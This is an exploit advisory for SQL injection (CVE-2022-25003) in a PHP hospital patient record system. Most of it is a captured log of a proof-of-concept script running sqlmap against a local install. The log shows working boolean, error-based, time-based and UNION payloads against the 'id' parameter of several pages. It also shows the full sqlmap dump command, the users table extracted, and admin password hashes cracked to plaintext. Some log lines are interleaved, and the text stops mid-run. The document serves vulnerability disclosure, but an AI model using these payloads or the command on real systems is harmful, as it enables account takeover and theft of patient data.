## Title: Hospital Patient Record Management System v1.0 Multiple SQLi
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25003
## Description:
The `id` parameter from Hospital Patient Record Management System v1.0 appears to be vulnerable to multiple SQL injection attacks.
The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py
SQL - Injecting for parameter 'id' in view_doctors.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:57:34 /2022-03-01/
[11:57:34] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=blov3a6cmm7...5ljvdr4pu6'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1807=1807 AND 'uYTA'='uYTA
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6423 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(6423=6423,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'KEjB'='KEjB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3271 FROM (SELECT(SLEEP(3)))ySPv) AND 'vkzK'='vkzK
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5548' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717071,0x71687362656d5a76494d674d5741614e7542625946744c6c5370416b486e7374717953684d687950,0x71716a7671),NULL,NULL,NULL,NULL,NULL-- -
---
[11:57:35] [INFO] testing MySQL
[11:57:35] [INFO] confirming MySQL
[11:57:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:57:35] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[11:57:35] [INFO] resumed: '0192023a7bbd73250516f069df18b500','admin'
[11:57:35] [INFO] resumed: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[11:57:35] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:57:35] [INFO] using hash method 'md5_generic_passwd'
[11:57:35] [INFO] resuming password 'admin123' for hash '0192023a7bbd73250516f069df18b500' for user 'admin'
[11:57:35] [INFO] resuming password 'stupid123' for hash '97a8afcf419cc231e1bdcd8584b0a246' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[11:57:35] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[11:57:35] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 11:57:35 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_doctor.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:57:39 /2022-03-01/
[11:57:39] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=fgqostf9v6a...c07feq0430'). Do you want to use those [Y/n] Y
[11:57:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:57:40] [INFO] testing if the target URL content is stable
[11:57:40] [INFO] target URL content is stable
[11:57:40] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:57:40] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:57:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:57:40] [WARNING] reflective value(s) found and filtering out
[11:57:41] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation")
[11:57:41] [INFO] testing 'Generic inline queries'
[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:57:41] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:57:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:57:41] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:57:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:57:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:57:41] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:57:41] [INFO] testing 'MySQL inline queries'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:57:41] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:57:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:57:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:57:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:57:48] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:57:48] [INFO] target URL appears to have 8 columns in query
[11:57:48] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3060=3060 AND 'WBCY'='WBCY
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(3263=3263,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZQSU'='ZQSU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9794 FROM (SELECT(SLEEP(3)))mBlw) AND 'oVQB'='oVQB
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5127' UNION ALL SELECT CONCAT(0x717a706a71,0x76436c4774624e78647045456f474773684944566f594345496f547a7146686e6477744e49516b51,0x71766a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:57:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP, PHP 8.1.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:57:48] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[11:57:49] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[11:57:49] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[11:57:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[11:57:49] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[11:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[11:57:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:57:49] [INFO] starting 4 processes
[11:57:54] [INFO] cracked password 'admin123' for user 'admin'
[cblake11:58:04'8:04INFO] [] current status: affac... |INFO] cracked password 'stupid123' for user '
[11:58:07] [INFO] current status: brawl... \
[11:58:07] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[11:58:07] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[11:58:07] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 11:58:07 /2022-03-01/
Traceback (most recent call last):
File "C:\Users\venvaropt\Desktop\CVE-2022-25003\PoC-SQL-automation-all-in-one.py", line 26, in <module>
os.system('python C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\sqlmap.py -u http://localhost/hprms/admin/doctors/manage_doctor.php?id=1 -p id --time-sec 3 --dbms=mysql --batch --answers="crack=Y,dict=Y,continue=Y,quit=N" -D hprms_db -T users -C username,password --dump')
KeyboardInterrupt
PS C:\Users\venvaropt\Desktop\CVE-2022-25003>
PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py
SQL - Injecting for parameter 'id' in view_doctors.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:01:23 /2022-03-01/
[12:01:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=62sg9tou51d...eqmgoe9q93'). Do you want to use those [Y/n] Y
[12:01:23] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:01:23] [INFO] testing if the target URL content is stable
[12:01:24] [INFO] target URL content is stable
[12:01:24] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:01:24] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:01:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:01:24] [WARNING] reflective value(s) found and filtering out
[12:01:24] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Sample Ward Room Good for 6 Patient")
[12:01:24] [INFO] testing 'Generic inline queries'
[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:01:24] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:01:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:01:24] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:01:24] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:01:24] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:01:24] [INFO] testing 'MySQL inline queries'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:01:24] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:01:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:01:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:01:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:01:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:01:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:01:31] [INFO] target URL appears to have 8 columns in query
[12:01:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8906=8906 AND 'Accs'='Accs
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1670 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1670=1670,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UIHB'='UIHB
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6841 FROM (SELECT(SLEEP(3)))ujWo) AND 'sPMh'='sPMh
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-1901' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x626561436b5273424d6544724748464f566f6851426f484a464c666a777a4768724b61577878704f,0x71706b7671),NULL,NULL,NULL,NULL-- -
---
[12:01:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.52, PHP 8.1.2, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:01:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:01:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:01:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:01:31] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:01:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:01:32] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:01:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:01:32] [INFO] starting 4 processes
[admin12312:01:38' for user '] [adminINFO' |
[cblake12:01:48'] cracked password 'stupid123' for user '
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:02:09] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:02:09] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:02:09 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_doctor.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:02:13 /2022-03-01/
[12:02:13] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4tp11beihnp...3genbf0lef'). Do you want to use those [Y/n] Y
[12:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:02:13] [INFO] testing if the target URL content is stable
[12:02:14] [INFO] target URL content is stable
[12:02:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:02:14] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:02:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:02:14] [WARNING] reflective value(s) found and filtering out
[12:02:14] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation")
[12:02:14] [INFO] testing 'Generic inline queries'
[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:02:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:02:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:02:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:02:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:02:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:02:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:02:14] [INFO] testing 'MySQL inline queries'
[12:02:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:02:14] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:02:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:02:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:02:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:02:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:02:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:02:21] [INFO] target URL appears to have 8 columns in query
[12:02:21] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3105=3105 AND 'nrvQ'='nrvQ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5846 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5846=5846,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NGNn'='NGNn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4775 FROM (SELECT(SLEEP(3)))kUeP) AND 'LHyf'='LHyf
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-4962' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x47746f4c5467486944786f586c45764a6c59724e6c415375424f5246744c486c456b455055764c70,0x717a706b71),NULL,NULL,NULL,NULL,NULL-- -
---
[12:02:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.2, PHP, Apache 2.4.52
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:02:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'
[12:02:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'
[12:02:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'
[12:02:21] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:02:21] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> Y
[12:02:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:02:21] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[12:02:21] [INFO] starting 4 processes
[] [12:02:30INFO] [] cracked password 'INFOadmin123] current status: 19051... \' for user 'admin'
[12:02:36] [] [INFOINFO] cracked password 'stupid123] current status: 70891... -' for user 'cblake'
Database: hprms_db
Table: users
[2 entries]
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |
+----------+----------------------------------------------+
[12:03:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv'
[12:03:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost'
[*] ending @ 12:03:01 /2022-03-01/
SQL - Injecting for parameter 'id' in manage_patient.php app
,d d ,d d8
888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b /
888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/
888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/
888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y
888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ /
_/
{1.6.1.2#dev}
https://sqlmap.org
https://www.nu11secur1ty.com/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:03:05 /2022-03-01/
[12:03:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3timnfi1ddl...4mandk4la0'). Do you want to use those [Y/n] Y
[12:03:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:03:06] [INFO] testing if the target URL content is stable
[12:03:07] [INFO] target URL content is stable
[12:03:07] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:03:07] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:03:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:03:07] [WARNING] reflective value(s) found and filtering out
[12:03:07] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Over There Street, Here City, Anywhere, 2306")
[12:03:07] [INFO] testing 'Generic inline queries'
[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:03:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:03:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:03:08] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:03:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
